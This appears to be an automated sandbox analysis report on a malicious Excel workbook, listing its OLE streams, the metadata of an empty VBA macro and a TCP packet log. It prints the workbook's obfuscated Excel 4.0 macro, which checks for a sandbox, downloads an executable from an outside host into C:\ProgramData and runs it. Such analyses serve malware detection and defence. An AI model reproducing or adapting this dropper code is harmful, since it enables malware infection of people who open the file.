Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 1142

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	1142
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 01 f0 00 00 00 0c 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 13 03 00 00 a7 03 00 00 00 00 00 00 01 00 00 00 1a aa 97 8c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"ThisWorkbook"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub a()


End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 108

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	108
Entropy:	4.18849998853
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.67634243661
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 216

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	216
Entropy:	3.65061706767
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . . . . . . . . . H P P C . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . * M . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a8 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 70 00 00 00 0c 00 00 00 88 00 00 00 0d 00 00 00 94 00 00 00 13 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 758471

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	758471
Entropy:	7.96834669995
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P P C B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . 2 F C . 8 . . . . . . . X
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 48 50 20 50 43 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 501

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	501
Entropy:	5.22430114012
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F e u i l 1 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 7 F 5 5 B 5 6 A 5 B A 9 8 B E 9 8 B E 9 C C 2 9 C C 2 " . . D P B = " E E E C 4 2 6 F C E 9 1 D 8 A E D 8 A E 2 7 5 2
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 65 75 69 6c 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 56 42

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	62
Entropy:	3.11998328335
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . F e u i l 1 . F . e . u . i . l . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 46 65 75 69 6c 31 00 46 00 65 00 75 00 69 00 6c 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2453

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2453
Entropy:	3.93667032984
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
Data Raw:	cc 61 af 00 00 01 00 ff 0c 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	VAX-order 68k Blit mpx/mux executable
Stream Size:	522
Entropy:	6.33446971204
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . K . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4b fc ca 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

;;;;;;;;;;;;;;;"=IF(GET.WORKSPACE(1+18);;CLOSE(TRUE))";;;;"=IF(GET.WORKSPACE(30+12);;CLOSE(TRUE))";;;;;;;;"=IF(ISNUMBER(SEARCH(""32"";GET.WORKSPACE(1)));GOTO(B126);GOTO(C126))";;;=;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""JJCCJJ"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & """"OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""";;;;"EXEC(""C:\""&CHAR(80)&CHAR(82)&""OGRAMDATA\a.""&CHAR(101)&""xe"")";;;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""BBCCBB"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & """"OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""""=FORMULA.FILL(D123&F123;B127)";"=FORMULA.FILL(D123&F125;C127)";;;;;;;"=FORMULA.FILL(D123&F124;B129)";"=FORMULA.FILL(D123&F124;C129)";;;;;;;;;;;=CLOSE(FALSE);=CLOSE(FALSE);;;;;;;

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 20:34:52.639247894 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.728754997 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.728857040 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.729995012 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.819730043 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.822626114 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.822662115 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.822681904 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.822696924 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.822726965 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.839371920 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.929435968 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.929589033 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.930550098 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020528078 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020565987 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020591021 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020612955 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020631075 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020633936 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020654917 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020658016 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020677090 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020698071 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020699024 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020720005 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020729065 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020742893 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020764112 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020798922 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110246897 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110290051 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110332966 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110340118 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110371113 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110384941 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110419035 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110430956 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110510111 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110551119 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110583067 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110600948 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110618114 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110632896 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110657930 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110672951 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110698938 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110718012 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110749960 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110795021 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110797882 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110821962 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110833883 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110846996 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110874891 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110893965 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110915899 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110929966 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110955954 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110987902 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.111020088 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.111049891 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.111092091 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.111099005 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.111129999 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.111176014 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200699091 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200731039 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200748920 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200766087 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200792074 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200838089 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200843096 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200896025 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200896025 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200912952 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200930119 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200939894 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200947046 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200982094 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201030970 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201036930 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201057911 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201075077 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201091051 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201093912 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201109886 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201124907 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201129913 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201142073 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201194048 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201199055 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201216936 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201234102 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201250076 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201252937 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201309919 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201481104 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201500893 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201518059 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201538086 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201539040 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201556921 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201574087 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201591015 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201607943 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201616049 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201626062 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201643944 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201661110 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201680899 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201699972 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201765060 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201802015 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201819897 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201837063 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201852083 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201854944 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201872110 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201889038 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201908112 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201909065 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201978922 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201984882 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.202071905 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.290482044 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290517092 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290534019 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290556908 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290577888 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290599108 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290620089 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290618896 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.290640116 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290663004 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290668964 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.290684938 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290695906 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.290712118 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290729046 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.290740013 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290757895 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.290796041 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.290919065 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290940046 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290961027 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290965080 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.290982008 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.290987968 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291009903 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291012049 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291035891 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291047096 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291059971 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291069031 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291083097 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291104078 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291104078 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291121960 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291125059 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291141033 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291157961 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291263103 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291285992 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291301966 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291306973 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291323900 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291328907 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291343927 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291351080 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291359901 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291368008 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.291382074 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.291403055 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.294881105 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.384448051 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:35:02.523370981 CET	49739	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:02.582634926 CET	80	49739	45.148.121.68	192.168.2.4
Feb 22, 2021 20:35:02.582767963 CET	49739	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:02.584227085 CET	49739	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:02.639071941 CET	80	49739	45.148.121.68	192.168.2.4
Feb 22, 2021 20:35:02.643884897 CET	80	49739	45.148.121.68	192.168.2.4
Feb 22, 2021 20:35:02.708363056 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:02.751732111 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:02.752068043 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:02.786649942 CET	49739	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:02.799896955 CET	49741	443	192.168.2.4	185.199.108.133
